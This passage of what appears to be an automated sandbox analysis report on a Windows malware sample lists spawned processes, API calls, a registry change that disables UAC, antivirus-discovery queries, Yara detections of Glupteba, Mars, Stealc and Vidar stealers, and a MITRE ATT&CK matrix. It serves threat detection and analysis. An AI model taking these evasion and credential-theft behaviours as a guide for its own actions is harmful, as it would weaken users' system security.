                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\gIvDEh2BZp9B1K9gi8nXHxAG.exe "C:\Users\user\Pictures\gIvDEh2BZp9B1K9gi8nXHxAG.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exe "C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exe"
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeProcess created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exeProcess created: unknown unknown
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_00401D20 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,GetLastError,12_2_00401D20
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_0040BC2F cpuid 12_2_0040BC2F
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: GetLocaleInfoA,12_2_0040D73D
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,15_2_00414570
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,15_2_009047D7
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeQueries volume information: C:\Users\user\Desktop\dl7WL77rkA.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_0040824B GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,12_2_0040824B
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_004143C0 GetProcessHeap,HeapAlloc,GetUserNameA,15_2_004143C0
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,15_2_004144B0
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_004031E9 GetStartupInfoA,GetProcessHeap,GetProcessHeap,HeapAlloc,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,__amsg_exit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__amsg_exit,__setenvp,__amsg_exit,__cinit,__amsg_exit,__wincmdln,12_2_004031E9
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Disables UAC (registry)
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
                  Source: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
                  Source: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Glupteba
                  Source: Yara matchFile source: 17.2.sUyDoVTGsfEnMY0oeyexTBut.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 32.2.pxzTG78L668f3mDyeDkHXryr.exe.2d80e67.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.VT4T5BrKWgz9d48cmEd8ePkZ.exe.2da0e67.14.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.YfSmDepXBWKsGmamEEWNYwB5.exe.2dc0e67.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 33.2.MK1r6sTJJ0KuvAGWdjimbW8H.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.sUyDoVTGsfEnMY0oeyexTBut.exe.2e10e67.14.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 18.2.VvPx7JMqkEvTJAQ2rPS2y2wf.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 36.2.PM6qM9TthMxsL1RAWEhuUNLx.exe.2e10e67.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 32.2.pxzTG78L668f3mDyeDkHXryr.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 18.2.VvPx7JMqkEvTJAQ2rPS2y2wf.exe.2dc0e67.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.YfSmDepXBWKsGmamEEWNYwB5.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.2.MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe.400000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.2.MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe.2cb0e67.13.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.VT4T5BrKWgz9d48cmEd8ePkZ.exe.400000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.LP2uR8v5nKtflOO7HsEX74Am.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 33.2.MK1r6sTJJ0KuvAGWdjimbW8H.exe.2dc0e67.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 36.2.PM6qM9TthMxsL1RAWEhuUNLx.exe.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.LP2uR8v5nKtflOO7HsEX74Am.exe.2e80e67.14.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001E.00000002.3216770112.0000000003203000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.3183308151.0000000000843000.00000040.00000001.01000000.00000020.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.3298037878.0000000003203000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000002.3398211956.00000000031C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.3043788624.0000000000843000.00000040.00000001.01000000.0000001E.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000024.00000002.3409633902.0000000003253000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.3061309929.0000000000843000.00000040.00000001.01000000.0000001C.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000024.00000002.3263335917.0000000000843000.00000040.00000001.01000000.00000022.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.3250452098.00000000032C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000002.3259586341.0000000000843000.00000040.00000001.01000000.0000001F.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: VT4T5BrKWgz9d48cmEd8ePkZ.exe PID: 7280, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: sUyDoVTGsfEnMY0oeyexTBut.exe PID: 7308, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: VvPx7JMqkEvTJAQ2rPS2y2wf.exe PID: 7392, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe PID: 7568, type: MEMORYSTR
                  Yara detected Mars stealer
                  Source: Yara matchFile source: 15.2.syncUpd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.3.syncUpd.exe.22d0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.syncUpd.exe.8f0e67.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.syncUpd.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.3.syncUpd.exe.22d0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.syncUpd.exe.8f0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000003.2437075338.00000000022D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Stealc
                  Source: Yara matchFile source: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2758288970.0000000000958000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: syncUpd.exe PID: 5376, type: MEMORYSTR
                  Yara detected Vidar stealer
                  Source: Yara matchFile source: 15.2.syncUpd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.3.syncUpd.exe.22d0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.syncUpd.exe.8f0e67.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.syncUpd.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.3.syncUpd.exe.22d0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.syncUpd.exe.8f0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000003.2437075338.00000000022D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                  Remote Access Functionality

                  barindex
                  Yara detected Glupteba
                  Source: Yara matchFile source: 17.2.sUyDoVTGsfEnMY0oeyexTBut.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 32.2.pxzTG78L668f3mDyeDkHXryr.exe.2d80e67.11.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.VT4T5BrKWgz9d48cmEd8ePkZ.exe.2da0e67.14.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.YfSmDepXBWKsGmamEEWNYwB5.exe.2dc0e67.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 33.2.MK1r6sTJJ0KuvAGWdjimbW8H.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.sUyDoVTGsfEnMY0oeyexTBut.exe.2e10e67.14.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 18.2.VvPx7JMqkEvTJAQ2rPS2y2wf.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 36.2.PM6qM9TthMxsL1RAWEhuUNLx.exe.2e10e67.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 32.2.pxzTG78L668f3mDyeDkHXryr.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 18.2.VvPx7JMqkEvTJAQ2rPS2y2wf.exe.2dc0e67.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.YfSmDepXBWKsGmamEEWNYwB5.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.2.MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe.400000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.2.MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe.2cb0e67.13.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 16.2.VT4T5BrKWgz9d48cmEd8ePkZ.exe.400000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.LP2uR8v5nKtflOO7HsEX74Am.exe.400000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 33.2.MK1r6sTJJ0KuvAGWdjimbW8H.exe.2dc0e67.15.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 36.2.PM6qM9TthMxsL1RAWEhuUNLx.exe.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 25.2.LP2uR8v5nKtflOO7HsEX74Am.exe.2e80e67.14.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001E.00000002.3216770112.0000000003203000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.3183308151.0000000000843000.00000040.00000001.01000000.00000020.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.3298037878.0000000003203000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000002.3398211956.00000000031C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.3043788624.0000000000843000.00000040.00000001.01000000.0000001E.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000024.00000002.3409633902.0000000003253000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.3061309929.0000000000843000.00000040.00000001.01000000.0000001C.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000024.00000002.3263335917.0000000000843000.00000040.00000001.01000000.00000022.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000002.3250452098.00000000032C3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000020.00000002.3259586341.0000000000843000.00000040.00000001.01000000.0000001F.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: VT4T5BrKWgz9d48cmEd8ePkZ.exe PID: 7280, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: sUyDoVTGsfEnMY0oeyexTBut.exe PID: 7308, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: VvPx7JMqkEvTJAQ2rPS2y2wf.exe PID: 7392, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe PID: 7568, type: MEMORYSTR
                  Yara detected Mars stealer
                  Source: Yara matchFile source: 15.2.syncUpd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.3.syncUpd.exe.22d0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.syncUpd.exe.8f0e67.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.syncUpd.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.3.syncUpd.exe.22d0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.syncUpd.exe.8f0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000003.2437075338.00000000022D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Stealc
                  Source: Yara matchFile source: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2758288970.0000000000958000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: syncUpd.exe PID: 5376, type: MEMORYSTR
                  Yara detected Vidar stealer
                  Source: Yara matchFile source: 15.2.syncUpd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.3.syncUpd.exe.22d0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.syncUpd.exe.8f0e67.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.syncUpd.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.3.syncUpd.exe.22d0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.syncUpd.exe.8f0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000003.2437075338.00000000022D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information11
                  Scripting                  		Valid Accounts21
                  Windows Management Instrumentation                  		11
                  Scripting                  		1
                  DLL Side-Loading                  		21
                  Disable or Modify Tools                  		OS Credential Dumping2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts21
                  Native API                  		1
                  DLL Side-Loading                  		411
                  Process Injection                  		1
                  Deobfuscate/Decode Files or Information                  		LSASS Memory1
                  Account Discovery                  		Remote Desktop Protocol1
                  Clipboard Data                  		14
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Shared Modules                  		1
                  Scheduled Task/Job                  		1
                  Scheduled Task/Job                  		21
                  Obfuscated Files or Information                  		Security Account Manager3
                  File and Directory Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive21
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
